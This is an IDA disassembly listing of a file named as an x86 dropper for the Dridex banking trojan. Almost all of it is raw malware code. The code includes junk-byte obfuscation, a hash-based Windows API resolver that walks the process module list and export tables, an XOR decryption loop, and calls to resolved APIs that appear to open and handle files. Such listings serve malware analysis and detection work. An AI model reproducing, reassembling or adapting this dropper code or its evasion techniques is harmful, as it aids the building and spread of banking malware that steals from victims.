seg000:00000000 ; seg000:00000000 ; +-------------------------------------------------------------------------+ seg000:00000000 ; | This file has been generated by The Interactive Disassembler (IDA) | seg000:00000000 ; | Copyright (c) 2014 Hex-Rays, <support@hex-rays.com> | seg000:00000000 ; +-------------------------------------------------------------------------+ seg000:00000000 ; seg000:00000000 ; Input MD5 : 99F2F77A015B60EA742E12E77907DEB1 seg000:00000000 ; Input CRC32 : 4C10D577 seg000:00000000 seg000:00000000 ; --------------------------------------------------------------------------- seg000:00000000 ; File Name : dridex_x86_dropper.bin seg000:00000000 ; Format : Binary file seg000:00000000 ; Base Address: 0000h Range: 0000h - 0C91h Loaded length: 00000C91h seg000:00000000 seg000:00000000 .686p seg000:00000000 .mmx seg000:00000000 .model flat seg000:00000000 seg000:00000000 ; =========================================================================== seg000:00000000 seg000:00000000 ; Segment type: Pure code seg000:00000000 seg000 segment byte public 'CODE' use32 seg000:00000000 assume cs:seg000 seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing seg000:00000000 sub esi, eax seg000:00000002 jmp loc_393 seg000:00000007 ; --------------------------------------------------------------------------- seg000:00000007 sub ebx, 65h ; 'e' seg000:0000000A neg ebx seg000:0000000C xor esi, 66h seg000:0000000F adc esi, 0A8h ; '¿' seg000:00000015 neg edi seg000:00000017 neg edx seg000:00000019 seg000:00000019 ; =============== S U B R O U T I N E ======================================= seg000:00000019 seg000:00000019 ; Attributes: bp-based frame seg000:00000019 seg000:00000019 sub_19 proc near ; CODE XREF: sub_336+5p seg000:00000019 ; seg000:000003D4p ... seg000:00000019 seg000:00000019 var_1C = dword ptr -1Ch seg000:00000019 var_18 = dword ptr -18h seg000:00000019 var_14 = dword ptr -14h seg000:00000019 var_10 = dword ptr -10h seg000:00000019 var_C = dword ptr -0Ch seg000:00000019 var_4 = dword ptr -4 seg000:00000019 arg_0 = dword ptr 8 seg000:00000019 seg000:00000019 push ebp seg000:0000001A mov ebp, esp seg000:0000001C sub esp, 1Ch seg000:0000001F push ebx seg000:00000020 push esi seg000:00000021 push edi seg000:00000022 adc edx, [ebp+var_1C] seg000:00000025 push 30h ; '0' seg000:00000027 xchg eax, esi seg000:00000028 jmp short loc_2D seg000:00000028 ; --------------------------------------------------------------------------- seg000:0000002A dw 89ECh seg000:0000002C db 72h seg000:0000002D ; --------------------------------------------------------------------------- seg000:0000002D seg000:0000002D loc_2D: ; CODE XREF: sub_19+Fj seg000:0000002D pop eax seg000:0000002E mov ecx, edi seg000:00000030 push dword ptr fs:[eax] seg000:00000033 not esi seg000:00000035 pop edx seg000:00000036 add edi, 0Fh seg000:00000039 mov edx, [edx+0Ch] seg000:0000003C dec ebx seg000:0000003D jmp short loc_42 seg000:0000003F ; --------------------------------------------------------------------------- seg000:0000003F and ah, [ebx-30h] seg000:00000042 seg000:00000042 loc_42: ; CODE XREF: sub_19+24j seg000:00000042 lea edx, [edx+14h] seg000:00000045 adc edi, 0F0h ; '' seg000:0000004B jmp short loc_4E seg000:0000004B ; --------------------------------------------------------------------------- seg000:0000004D db 6Ah seg000:0000004E ; --------------------------------------------------------------------------- seg000:0000004E seg000:0000004E loc_4E: ; CODE XREF: sub_19+32j seg000:0000004E mov ebx, edx seg000:00000050 sub ecx, [ebp+var_14] seg000:00000053 seg000:00000053 loc_53: ; CODE XREF: sub_19+EAj seg000:00000053 and [ebp+var_4], esi seg000:00000056 mov edx, [edx] seg000:00000058 dec ecx seg000:00000059 xor edi, edi seg000:0000005B add eax, 0BBh ; '+' seg000:00000060 cmp edx, ebx seg000:00000062 jnz short loc_81 seg000:00000064 mov [ebp+var_C], 0E6h ; 'µ' seg000:0000006B jmp short loc_6E seg000:0000006D ; --------------------------------------------------------------------------- seg000:0000006D stosd seg000:0000006E seg000:0000006E loc_6E: ; CODE XREF: sub_19+52j seg000:0000006E xor eax, eax seg000:00000070 xchg edx, [ebp+var_10] seg000:00000073 pop edi seg000:00000074 pop esi seg000:00000075 pop ebx seg000:00000076 leave seg000:00000077 retn 4 seg000:0000007A ; --------------------------------------------------------------------------- seg000:0000007A sbb ebx, edx seg000:0000007C jmp short loc_81 seg000:0000007C ; --------------------------------------------------------------------------- seg000:0000007E db 4Fh ; O seg000:0000007F db 87h seg000:00000080 db 9Ah seg000:00000081 ; --------------------------------------------------------------------------- seg000:00000081 seg000:00000081 loc_81: ; CODE XREF: sub_19+49j seg000:00000081 ; sub_19+63j seg000:00000081 not eax seg000:00000083 push ebx seg000:00000084 not eax seg000:00000086 jmp short loc_89 seg000:00000088 ; --------------------------------------------------------------------------- seg000:00000088 wait seg000:00000089 seg000:00000089 loc_89: ; CODE XREF: sub_19+6Dj seg000:00000089 lea esi, [edx+24h] seg000:0000008C or eax, 0EAh seg000:00000091 push edx seg000:00000092 not ecx seg000:00000094 movzx ecx, word ptr [esi] seg000:00000097 adc eax, 0F1h ; '±' seg000:0000009C jmp short loc_A0 seg000:0000009E ; --------------------------------------------------------------------------- seg000:0000009E sbb al, al seg000:000000A0 seg000:000000A0 loc_A0: ; CODE XREF: sub_19+83j seg000:000000A0 mov esi, [esi+4] seg000:000000A3 mov ebx, edx seg000:000000A5 shr ecx, 1 seg000:000000A7 neg eax seg000:000000A9 cmp ecx, 0 seg000:000000AC jz short loc_E1 seg000:000000AE inc edx seg000:000000AF seg000:000000AF loc_AF: ; CODE XREF: sub_19+C4j seg000:000000AF adc edx, esi seg000:000000B1 rol edi, 5 seg000:000000B4 nop seg000:000000B5 jmp short loc_BA seg000:000000B5 ; --------------------------------------------------------------------------- seg000:000000B7 db 0F9h ; ¨ seg000:000000B8 db 91h, 7Eh seg000:000000BA ; --------------------------------------------------------------------------- seg000:000000BA seg000:000000BA loc_BA: ; CODE XREF: sub_19+9Cj seg000:000000BA lodsw seg000:000000BC inc ebx seg000:000000BD and eax, 0FFFFh seg000:000000C2 inc ebx seg000:000000C3 jmp short loc_C7 seg000:000000C3 ; --------------------------------------------------------------------------- seg000:000000C5 db 81h, 94h seg000:000000C7 ; --------------------------------------------------------------------------- seg000:000000C7 seg000:000000C7 loc_C7: ; CODE XREF: sub_19+AAj seg000:000000C7 or eax, 20h seg000:000000CA mov edx, [ebp+var_18] seg000:000000CD xor edi, eax seg000:000000CF and eax, esi seg000:000000D1 jmp short loc_D4 seg000:000000D1 ; --------------------------------------------------------------------------- seg000:000000D3 db 0Dh seg000:000000D4 ; --------------------------------------------------------------------------- seg000:000000D4 seg000:000000D4 loc_D4: ; CODE XREF: sub_19+B8j seg000:000000D4 xor edi, 756D1Fh seg000:000000DA sub ebx, ecx seg000:000000DC dec ecx seg000:000000DD jnz short loc_AF seg000:000000DF xchg edx, edx seg000:000000E1 seg000:000000E1 loc_E1: ; CODE XREF: sub_19+93j seg000:000000E1 neg eax seg000:000000E3 pop edx seg000:000000E4 xchg ecx, ecx seg000:000000E6 pop ebx seg000:000000E7 xor esi, esi seg000:000000E9 jmp short loc_EC seg000:000000E9 ; --------------------------------------------------------------------------- seg000:000000EB db 7Dh seg000:000000EC ; --------------------------------------------------------------------------- seg000:000000EC seg000:000000EC loc_EC: ; CODE XREF: sub_19+D0j seg000:000000EC cmp edi, [ebp+arg_0] seg000:000000EF jnz short loc_101 seg000:000000F1 xchg esi, ecx seg000:000000F3 mov eax, [edx+10h] seg000:000000F6 inc ebx seg000:000000F7 pop edi seg000:000000F8 pop esi seg000:000000F9 pop ebx seg000:000000FA leave seg000:000000FB retn 4 seg000:000000FE ; --------------------------------------------------------------------------- seg000:000000FE sub ecx, [ebp+var_18] seg000:00000101 seg000:00000101 loc_101: ; CODE XREF: sub_19+D6j seg000:00000101 sbb esi, ecx seg000:00000103 jmp loc_53 seg000:00000103 sub_19 endp seg000:00000103 seg000:00000108 seg000:00000108 ; =============== S U B R O U T I N E ======================================= seg000:00000108 seg000:00000108 ; Attributes: bp-based frame seg000:00000108 seg000:00000108 sub_108 proc near ; CODE XREF: sub_336+10p seg000:00000108 ; seg000:000003DFp ... seg000:00000108 seg000:00000108 var_58 = dword ptr -58h seg000:00000108 var_54 = dword ptr -54h seg000:00000108 var_3C = dword ptr -3Ch seg000:00000108 var_34 = dword ptr -34h seg000:00000108 var_30 = dword ptr -30h seg000:00000108 var_2C = dword ptr -2Ch seg000:00000108 var_28 = dword ptr -28h seg000:00000108 var_18 = dword ptr -18h seg000:00000108 var_10 = dword ptr -10h seg000:00000108 var_8 = dword ptr -8 seg000:00000108 var_4 = dword ptr -4 seg000:00000108 arg_0 = dword ptr 8 seg000:00000108 arg_4 = dword ptr 0Ch seg000:00000108 seg000:00000108 push ebp seg000:00000109 mov ebp, esp seg000:0000010B sub esp, 58h seg000:0000010E push ebx seg000:0000010F push esi seg000:00000110 push edi seg000:00000111 inc ebx seg000:00000112 jmp short loc_117 seg000:00000114 ; --------------------------------------------------------------------------- seg000:00000114 cmp al, 77h ; 'w' seg000:00000116 dec eax seg000:00000117 seg000:00000117 loc_117: ; CODE XREF: sub_108+Aj seg000:00000117 mov eax, [ebp+arg_0] seg000:0000011A xchg edi, [ebp+var_2C] seg000:0000011D mov ecx, eax seg000:0000011F add ecx, 3Ch ; '<' seg000:00000122 add eax, [ecx] seg000:00000124 adc esi, ecx seg000:00000126 add eax, 78h ; 'x' seg000:00000129 and edx, 1Dh seg000:0000012C jmp short loc_131 seg000:0000012C ; --------------------------------------------------------------------------- seg000:0000012E dw 0DAC7h seg000:00000130 db 3 seg000:00000131 ; --------------------------------------------------------------------------- seg000:00000131 seg000:00000131 loc_131: ; CODE XREF: sub_108+24j seg000:00000131 push dword ptr [eax] seg000:00000133 imul edx, edi seg000:00000136 jmp short loc_13A seg000:00000138 ; --------------------------------------------------------------------------- seg000:00000138 retn seg000:00000138 ; --------------------------------------------------------------------------- seg000:00000139 db 0B8h seg000:0000013A ; --------------------------------------------------------------------------- seg000:0000013A seg000:0000013A loc_13A: ; CODE XREF: sub_108+2Ej seg000:0000013A pop eax seg000:0000013B inc ebx seg000:0000013C add eax, [ebp+arg_0] seg000:0000013F xor esi, ecx seg000:00000141 jmp short loc_146 seg000:00000143 ; --------------------------------------------------------------------------- seg000:00000143 push ecx seg000:00000144 mov ah, 1Dh seg000:00000146 seg000:00000146 loc_146: ; CODE XREF: sub_108+39j seg000:00000146 mov [ebp+var_18], eax seg000:00000149 mov edx, [ebp+var_34] seg000:0000014C mov ecx, [eax+20h] seg000:0000014F mov ebx, eax seg000:00000151 jmp short loc_155 seg000:00000153 ; --------------------------------------------------------------------------- seg000:00000153 dec ebp seg000:00000154 push ds seg000:00000155 seg000:00000155 loc_155: ; CODE XREF: sub_108+49j seg000:00000155 add ecx, [ebp+arg_0] seg000:00000158 inc edx seg000:00000159 mov [ebp+var_10], ecx seg000:0000015C not ecx seg000:0000015E mov ecx, [eax+18h] seg000:00000161 not ebx seg000:00000163 jmp short loc_168 seg000:00000165 ; --------------------------------------------------------------------------- seg000:00000165 jmp short loc_1C5 seg000:00000167 ; --------------------------------------------------------------------------- seg000:00000167 aas seg000:00000168 seg000:00000168 loc_168: ; CODE XREF: sub_108+5Bj seg000:00000168 mov [ebp+var_30], ecx seg000:0000016B mov ebx, ebx seg000:0000016D seg000:0000016D loc_16D: ; CODE XREF: sub_108+131j seg000:0000016D adc edi, eax seg000:0000016F jmp short loc_173 seg000:00000171 ; --------------------------------------------------------------------------- seg000:00000171 cli seg000:00000172 in eax, dx seg000:00000173 seg000:00000173 loc_173: ; CODE XREF: sub_108+67j seg000:00000173 dec [ebp+var_30] seg000:00000176 sbb ebx, eax seg000:00000178 mov ecx, [ebp+var_30] seg000:0000017B xor eax, eax seg000:0000017D jmp short loc_181 seg000:0000017F ; --------------------------------------------------------------------------- seg000:0000017F movsb seg000:00000180 daa seg000:00000181 seg000:00000181 loc_181: ; CODE XREF: sub_108+75j seg000:00000181 shl ecx, 2 seg000:00000184 inc esi seg000:00000185 add ecx, [ebp+var_10] seg000:00000188 mov ebx, 0ABh ; '½' seg000:0000018D jmp short loc_190 seg000:0000018D ; --------------------------------------------------------------------------- seg000:0000018F db 9Ah seg000:00000190 ; --------------------------------------------------------------------------- seg000:00000190 seg000:00000190 loc_190: ; CODE XREF: sub_108+85j seg000:00000190 mov ecx, [ecx] seg000:00000192 inc ebx seg000:00000193 add ecx, [ebp+arg_0] seg000:00000196 sbb esi, eax seg000:00000198 xor eax, eax seg000:0000019A not esi seg000:0000019C seg000:0000019C loc_19C: ; CODE XREF: sub_108+CDj seg000:0000019C sbb edi, ecx seg000:0000019E movzx edx, byte ptr [ecx] seg000:000001A1 neg ebx seg000:000001A3 or edx, 20h seg000:000001A6 xor esi, 14h seg000:000001A9 jmp short loc_1AD seg000:000001AB ; --------------------------------------------------------------------------- seg000:000001AB push ecx seg000:000001AC cmc seg000:000001AD seg000:000001AD loc_1AD: ; CODE XREF: sub_108+A1j seg000:000001AD rol eax, 5 seg000:000001B0 add [ebp+var_8], 9Dh ; 'Ø' seg000:000001B7 xor eax, edx seg000:000001B9 xor [ebp+var_58], 0DDh seg000:000001C0 xor eax, 756D1Fh seg000:000001C5 seg000:000001C5 loc_1C5: ; CODE XREF: sub_108+5Dj seg000:000001C5 add esi, 0AFh ; '»' seg000:000001CB jmp short loc_1CF seg000:000001CD ; --------------------------------------------------------------------------- seg000:000001CD sub bl, bl seg000:000001CF seg000:000001CF loc_1CF: ; CODE XREF: sub_108+C3j seg000:000001CF inc ecx seg000:000001D0 xchg edi, esi seg000:000001D2 cmp byte ptr [ecx], 0 seg000:000001D5 jnz short loc_19C seg000:000001D7 dec esi seg000:000001D8 jmp short loc_1DD seg000:000001D8 ; --------------------------------------------------------------------------- seg000:000001DA dw 1513h seg000:000001DC db 0DEh seg000:000001DD ; --------------------------------------------------------------------------- seg000:000001DD seg000:000001DD loc_1DD: ; CODE XREF: sub_108+D0j seg000:000001DD cmp eax, [ebp+arg_4] seg000:000001E0 jnz short loc_230 seg000:000001E2 imul edi, edi seg000:000001E5 jmp short loc_1E8 seg000:000001E7 ; --------------------------------------------------------------------------- seg000:000001E7 inc edx seg000:000001E8 seg000:000001E8 loc_1E8: ; CODE XREF: sub_108+DDj seg000:000001E8 mov eax, [ebp+var_18] seg000:000001EB or esi, eax seg000:000001ED add eax, 24h ; '$' seg000:000001F0 neg edx seg000:000001F2 mov eax, [eax] seg000:000001F4 neg esi seg000:000001F6 add eax, [ebp+arg_0] seg000:000001F9 inc esi seg000:000001FA mov ecx, [ebp+var_30] seg000:000001FD neg edi seg000:000001FF movzx ecx, word ptr [eax+ecx*2] seg000:00000203 inc edx seg000:00000204 jmp short loc_208 seg000:00000204 ; --------------------------------------------------------------------------- seg000:00000206 db 0ADh ; ¡ seg000:00000207 db 9Ah seg000:00000208 ; --------------------------------------------------------------------------- seg000:00000208 seg000:00000208 loc_208: ; CODE XREF: sub_108+FCj seg000:00000208 mov eax, [ebp+var_18] seg000:0000020B add edx, edi seg000:0000020D add eax, 1Ch seg000:00000210 mov edi, ebx seg000:00000212 mov eax, [eax] seg000:00000214 inc esi seg000:00000215 add eax, [ebp+arg_0] seg000:00000218 xor esi, [ebp+var_4] seg000:0000021B mov eax, [eax+ecx*4] seg000:0000021E neg esi seg000:00000220 add eax, [ebp+arg_0] seg000:00000223 adc [ebp+var_54], esi seg000:00000226 pop edi seg000:00000227 pop esi seg000:00000228 pop ebx seg000:00000229 leave seg000:0000022A retn 8 seg000:0000022D ; --------------------------------------------------------------------------- seg000:0000022D xchg edx, [ebp+var_28] seg000:00000230 seg000:00000230 loc_230: ; CODE XREF: sub_108+D8j seg000:00000230 adc ecx, edi seg000:00000232 jmp short loc_235 seg000:00000232 ; --------------------------------------------------------------------------- seg000:00000234 db 20h seg000:00000235 ; --------------------------------------------------------------------------- seg000:00000235 seg000:00000235 loc_235: ; CODE XREF: sub_108+12Aj seg000:00000235 cmp [ebp+var_30], 0 seg000:00000239 jnz loc_16D seg000:0000023F adc [ebp+var_58], esi seg000:00000242 xor eax, eax seg000:00000244 sbb esi, [ebp+var_3C] seg000:00000247 pop edi seg000:00000248 pop esi seg000:00000249 pop ebx seg000:0000024A leave seg000:0000024B retn 8 seg000:0000024B sub_108 endp seg000:0000024B seg000:0000024E seg000:0000024E ; =============== S U B R O U T I N E ======================================= seg000:0000024E seg000:0000024E ; Attributes: bp-based frame seg000:0000024E seg000:0000024E sub_24E proc near ; CODE XREF: seg000:00000695p seg000:0000024E seg000:0000024E var_30 = dword ptr -30h seg000:0000024E var_24 = dword ptr -24h seg000:0000024E var_20 = dword ptr -20h seg000:0000024E var_1C = dword ptr -1Ch seg000:0000024E var_10 = dword ptr -10h seg000:0000024E var_8 = dword ptr -8 seg000:0000024E arg_0 = dword ptr 8 seg000:0000024E arg_4 = byte ptr 0Ch seg000:0000024E arg_8 = dword ptr 10h seg000:0000024E seg000:0000024E push ebp seg000:0000024F mov ebp, esp seg000:00000251 sub esp, 24h seg000:00000254 push ebx seg000:00000255 push esi seg000:00000256 add [ebp+var_20], ebx seg000:00000259 lea eax, [ebp+arg_4] seg000:0000025C push dword ptr [eax] seg000:0000025E xchg edi, [ebp+var_10] seg000:00000261 pop ebx seg000:00000262 or esi, ecx seg000:00000264 jmp short loc_268 seg000:00000264 ; --------------------------------------------------------------------------- seg000:00000266 db 1Fh seg000:00000267 db 0A9h seg000:00000268 ; --------------------------------------------------------------------------- seg000:00000268 seg000:00000268 loc_268: ; CODE XREF: sub_24E+16j seg000:00000268 sub ebx, 3 seg000:0000026B xchg ecx, edx seg000:0000026D jmp short loc_270 seg000:0000026F ; --------------------------------------------------------------------------- seg000:0000026F pop edi seg000:00000270 seg000:00000270 loc_270: ; CODE XREF: sub_24E+1Fj seg000:00000270 mov esi, [ebp+arg_0] seg000:00000273 mov edi, [ebp+var_1C] seg000:00000276 seg000:00000276 loc_276: ; CODE XREF: sub_24E:loc_2E5j seg000:00000276 xor ecx, eax seg000:00000278 cmp ebx, 0 seg000:0000027B jz short loc_2E7 seg000:0000027D imul edi, edi seg000:00000280 mov eax, [esi] seg000:00000282 dec ecx seg000:00000283 xor eax, [ebp+arg_8] seg000:00000286 imul edi, esi seg000:00000289 mov [esi], eax seg000:0000028B or [ebp+var_24], ecx seg000:0000028E push [ebp+arg_8] seg000:00000291 mov edx, esi seg000:00000293 rol [esp+30h+var_30], 4 seg000:00000297 mov [ebp+var_20], 0FDh ; '²' seg000:0000029E rol [esp+30h+var_30], 2 seg000:000002A2 imul edi, 0Bh seg000:000002A5 jmp short loc_2A8 seg000:000002A5 ; --------------------------------------------------------------------------- seg000:000002A7 db 2Bh seg000:000002A8 ; --------------------------------------------------------------------------- seg000:000002A8 seg000:000002A8 loc_2A8: ; CODE XREF: sub_24E+57j seg000:000002A8 rol [esp+30h+var_30], 1 seg000:000002AB neg edi seg000:000002AD lea ecx, [ebp+arg_4] seg000:000002B0 mov ecx, [ecx] seg000:000002B2 sub [esp+30h+var_30], ecx seg000:000002B5 sbb edx, 17h seg000:000002B8 sub [esp+30h+var_30], 49613F8Ah seg000:000002BF dec edx seg000:000002C0 jmp short loc_2C4 seg000:000002C0 ; --------------------------------------------------------------------------- seg000:000002C2 dw 0CE15h seg000:000002C4 ; --------------------------------------------------------------------------- seg000:000002C4 seg000:000002C4 loc_2C4: ; CODE XREF: sub_24E+72j seg000:000002C4 sub [esp+30h+var_30], 34C348h seg000:000002CB sbb edi, [ebp+var_8] seg000:000002CE jmp short loc_2D2 seg000:000002CE ; --------------------------------------------------------------------------- seg000:000002D0 db 0D3h, 0AFh seg000:000002D2 ; --------------------------------------------------------------------------- seg000:000002D2 seg000:000002D2 loc_2D2: ; CODE XREF: sub_24E+80j seg000:000002D2 pop [ebp+arg_8] seg000:000002D5 sub eax, ebx seg000:000002D7 dec ebx seg000:000002D8 mov eax, [ebp+var_24] seg000:000002DB jmp short loc_2DF seg000:000002DD ; --------------------------------------------------------------------------- seg000:000002DD xor esp, [ecx] seg000:000002DF seg000:000002DF loc_2DF: ; CODE XREF: sub_24E+8Dj seg000:000002DF inc esi seg000:000002E0 neg edx seg000:000002E2 jmp short loc_2E5 seg000:000002E2 ; --------------------------------------------------------------------------- seg000:000002E4 db 9 seg000:000002E5 ; --------------------------------------------------------------------------- seg000:000002E5 seg000:000002E5 loc_2E5: ; CODE XREF: sub_24E+94j seg000:000002E5 jmp short loc_276 seg000:000002E7 ; --------------------------------------------------------------------------- seg000:000002E7 seg000:000002E7 loc_2E7: ; CODE XREF: sub_24E+2Dj seg000:000002E7 mov [ebp+var_10], esi seg000:000002EA jmp short loc_2EF seg000:000002EA ; --------------------------------------------------------------------------- seg000:000002EC db 0C8h, 29h, 5Bh seg000:000002EF ; --------------------------------------------------------------------------- seg000:000002EF seg000:000002EF loc_2EF: ; CODE XREF: sub_24E+9Cj seg000:000002EF pop esi seg000:000002F0 pop ebx seg000:000002F1 leave seg000:000002F2 retn 0Ch seg000:000002F2 sub_24E endp seg000:000002F2 seg000:000002F5 seg000:000002F5 ; =============== S U B R O U T I N E ======================================= seg000:000002F5 seg000:000002F5 ; Attributes: bp-based frame seg000:000002F5 seg000:000002F5 sub_2F5 proc near ; CODE XREF: seg000:loc_3ACp seg000:000002F5 seg000:000002F5 var_30 = dword ptr -30h seg000:000002F5 var_8 = dword ptr -8 seg000:000002F5 var_4 = dword ptr -4 seg000:000002F5 seg000:000002F5 push ebp seg000:000002F6 mov ebp, esp seg000:000002F8 sub esp, 34h seg000:000002FB xchg edi, [ebp+var_4] seg000:000002FE mov [ebp+var_8], 0 seg000:00000305 inc esi seg000:00000306 lea eax, [ebp+var_8] seg000:00000309 adc esi, ebx seg000:0000030B jmp short loc_310 seg000:0000030B ; --------------------------------------------------------------------------- seg000:0000030D db 0BCh, 0EAh, 0ABh seg000:00000310 ; --------------------------------------------------------------------------- seg000:00000310 seg000:00000310 loc_310: ; CODE XREF: sub_2F5+16j seg000:00000310 push eax seg000:00000311 inc edi seg000:00000312 call sub_336 seg000:00000317 sbb edx, ecx seg000:00000319 mov eax, [esp+38h+var_30] seg000:0000031D xor ecx, 2Dh seg000:00000320 jmp short loc_324 seg000:00000320 ; --------------------------------------------------------------------------- seg000:00000322 dw 9712h seg000:00000324 ; --------------------------------------------------------------------------- seg000:00000324 seg000:00000324 loc_324: ; CODE XREF: sub_2F5+2Bj seg000:00000324 inc dword ptr [eax] seg000:00000326 sub edx, esi seg000:00000328 jmp short loc_32B seg000:0000032A ; --------------------------------------------------------------------------- seg000:0000032A lodsd seg000:0000032B seg000:0000032B loc_32B: ; CODE XREF: sub_2F5+33j seg000:0000032B mov eax, 1 seg000:00000330 dec edx seg000:00000331 retn 8 seg000:00000331 sub_2F5 endp ; sp-analysis failed seg000:00000331 seg000:00000334 ; --------------------------------------------------------------------------- seg000:00000334 sub edi, esi seg000:00000336 seg000:00000336 ; =============== S U B R O U T I N E ======================================= seg000:00000336 seg000:00000336 seg000:00000336 sub_336 proc near ; CODE XREF: sub_2F5+1Dp seg000:00000336 push 7C535E21h seg000:0000033B call sub_19 seg000:00000340 push 385D16CAh seg000:00000345 push eax seg000:00000346 call sub_108 seg000:0000034B call eax seg000:0000034D not edi seg000:0000034F cmp dword ptr [ebp-8], 15h seg000:00000353 jz short loc_37F seg000:00000355 add ecx, 0E5h ; 'Õ' seg000:0000035B cmp dword ptr [ebp-8], 1Ch seg000:0000035F jz short loc_37F seg000:00000361 add eax, eax seg000:00000363 cmp dword ptr [ebp-8], 7 seg000:00000367 jz short loc_37F seg000:00000369 imul ebx, edx seg000:0000036C jmp short loc_36F seg000:0000036E ; --------------------------------------------------------------------------- seg000:0000036E cmpsd seg000:0000036F seg000:0000036F loc_36F: ; CODE XREF: sub_336+36j seg000:0000036F cmp dword ptr [ebp-8], 6 seg000:00000373 jz short loc_37F seg000:00000375 or ebx, eax seg000:00000377 jmp short loc_37A seg000:00000377 ; --------------------------------------------------------------------------- seg000:00000379 db 6Dh seg000:0000037A ; --------------------------------------------------------------------------- seg000:0000037A seg000:0000037A loc_37A: ; CODE XREF: sub_336+41j seg000:0000037A jmp short loc_38A seg000:0000037C ; --------------------------------------------------------------------------- seg000:0000037C xchg edi, [ebp-28h] seg000:0000037F seg000:0000037F loc_37F: ; CODE XREF: sub_336+1Dj seg000:0000037F ; sub_336+29j ... seg000:0000037F mov ebx, eax seg000:00000381 mov eax, 1 seg000:00000386 not edi seg000:00000388 leave seg000:00000389 retn seg000:0000038A ; --------------------------------------------------------------------------- seg000:0000038A seg000:0000038A loc_38A: ; CODE XREF: sub_336:loc_37Aj seg000:0000038A xor [ebp-10h], ecx seg000:0000038D xor eax, eax seg000:0000038F add edi, ecx seg000:00000391 leave seg000:00000392 retn seg000:00000392 sub_336 endp ; sp-analysis failed seg000:00000392 seg000:00000393 ; --------------------------------------------------------------------------- seg000:00000393 seg000:00000393 loc_393: ; CODE XREF: seg000:00000002j seg000:00000393 push ebp seg000:00000394 mov ebp, esp seg000:00000396 sub esp, 828h seg000:0000039C mov dword ptr [ebp-334h], 0FFFFFFFFh seg000:000003A6 adc eax, ecx seg000:000003A8 jmp short loc_3AC seg000:000003AA ; --------------------------------------------------------------------------- seg000:000003AA sbb al, 12h seg000:000003AC seg000:000003AC loc_3AC: ; CODE XREF: seg000:000003A8j seg000:000003AC call sub_2F5 seg000:000003B1 and esi, ecx seg000:000003B3 jmp short loc_3B7 seg000:000003B3 ; --------------------------------------------------------------------------- seg000:000003B5 db 2Dh, 1Bh seg000:000003B7 ; --------------------------------------------------------------------------- seg000:000003B7 seg000:000003B7 loc_3B7: ; CODE XREF: seg000:000003B3j seg000:000003B7 cmp eax, 0 seg000:000003BA jnz loc_C6B seg000:000003C0 and ecx, 0CCh seg000:000003C6 push 0 seg000:000003C8 xor dword ptr [ebp-58h], 6Eh seg000:000003CC jmp short loc_3CF seg000:000003CC ; --------------------------------------------------------------------------- seg000:000003CE db 0E8h seg000:000003CF ; --------------------------------------------------------------------------- seg000:000003CF seg000:000003CF loc_3CF: ; CODE XREF: seg000:000003CCj seg000:000003CF push 0F3BB9845h seg000:000003D4 call sub_19 seg000:000003D9 push 0C68749FDh seg000:000003DE push eax seg000:000003DF call sub_108 seg000:000003E4 call eax seg000:000003E6 mov [ebp-810h], ecx seg000:000003EC push 400h seg000:000003F1 neg edi seg000:000003F3 lea ecx, [ebp-7E8h] seg000:000003F9 xchg edx, [ebp-80Ch] seg000:000003FF push ecx seg000:00000400 inc edx seg000:00000401 jmp short loc_405 seg000:00000403 ; --------------------------------------------------------------------------- seg000:00000403 and al, 13h seg000:00000405 seg000:00000405 loc_405: ; CODE XREF: seg000:00000401j seg000:00000405 push eax seg000:00000406 dec ebx seg000:00000407 push 0F3BB9845h seg000:0000040C call sub_19 seg000:00000411 push 91DD5372h seg000:00000416 push eax seg000:00000417 call sub_108 seg000:0000041C call eax seg000:0000041E adc edi, [ebp-35Ch] seg000:00000424 push 0 seg000:00000426 and ecx, esi seg000:00000428 jmp short loc_42C seg000:00000428 ; --------------------------------------------------------------------------- seg000:0000042A db 60h ; ` seg000:0000042B db 69h seg000:0000042C ; --------------------------------------------------------------------------- seg000:0000042C seg000:0000042C loc_42C: ; CODE XREF: seg000:00000428j seg000:0000042C push 80h ; 'Ç' seg000:00000431 inc esi seg000:00000432 push 4 seg000:00000434 add [ebp-4], ebx seg000:00000437 push 0 seg000:00000439 dec ecx seg000:0000043A jmp short loc_43D seg000:0000043A ; --------------------------------------------------------------------------- seg000:0000043C db 4Ch seg000:0000043D ; --------------------------------------------------------------------------- seg000:0000043D seg000:0000043D loc_43D: ; CODE XREF: seg000:0000043Aj seg000:0000043D push 1 seg000:0000043F xor edi, ecx seg000:00000441 push 80000000h seg000:00000446 neg eax seg000:00000448 jmp short loc_44B seg000:00000448 ; --------------------------------------------------------------------------- seg000:0000044A db 0F2h seg000:0000044B ; --------------------------------------------------------------------------- seg000:0000044B seg000:0000044B loc_44B: ; CODE XREF: seg000:00000448j seg000:0000044B lea ecx, [ebp-7E8h] seg000:00000451 sub ebx, edx seg000:00000453 push ecx seg000:00000454 or eax, 32h seg000:00000457 push 0F3BB9845h seg000:0000045C call sub_19 seg000:00000461 push 0E0C008EEh seg000:00000466 push eax seg000:00000467 call sub_108 seg000:0000046C call eax seg000:0000046E and edi, [ebp-64h] seg000:00000471 cmp eax, 0FFFFFFFFh seg000:00000474 jnz short loc_483 seg000:00000476 xchg edx, [ebp-35Ch] seg000:0000047C jmp short locret_481 seg000:0000047E ; --------------------------------------------------------------------------- seg000:0000047E leave seg000:0000047F lds edi, [ebx] seg000:00000481 seg000:00000481 locret_481: ; CODE XREF: seg000:0000047Cj seg000:00000481 leave seg000:00000482 retn seg000:00000483 ; --------------------------------------------------------------------------- seg000:00000483 seg000:00000483 loc_483: ; CODE XREF: seg000:00000474j seg000:00000483 adc ebx, edi seg000:00000485 jmp short loc_489 seg000:00000487 ; --------------------------------------------------------------------------- seg000:00000487 or al, 96h seg000:00000489 seg000:00000489 loc_489: ; CODE XREF: seg000:00000485j seg000:00000489 mov [ebp-3DCh], eax seg000:0000048F add ebx, ecx seg000:00000491 push 0 seg000:00000493 sbb edi, 34h ; '4' seg000:00000496 jmp short loc_49B seg000:00000496 ; --------------------------------------------------------------------------- seg000:00000498 db 61h ; a seg000:00000499 db 5, 4 seg000:0000049B ; --------------------------------------------------------------------------- seg000:0000049B seg000:0000049B loc_49B: ; CODE XREF: seg000:00000496j seg000:0000049B push dword ptr [ebp-3DCh] seg000:000004A1 not esi seg000:000004A3 push 0F3BB9845h seg000:000004A8 call sub_19 seg000:000004AD push 0B2EFEE23h seg000:000004B2 push eax seg000:000004B3 call sub_108 seg000:000004B8 call eax seg000:000004BA sub ecx, edi seg000:000004BC mov [ebp-3D0h], eax 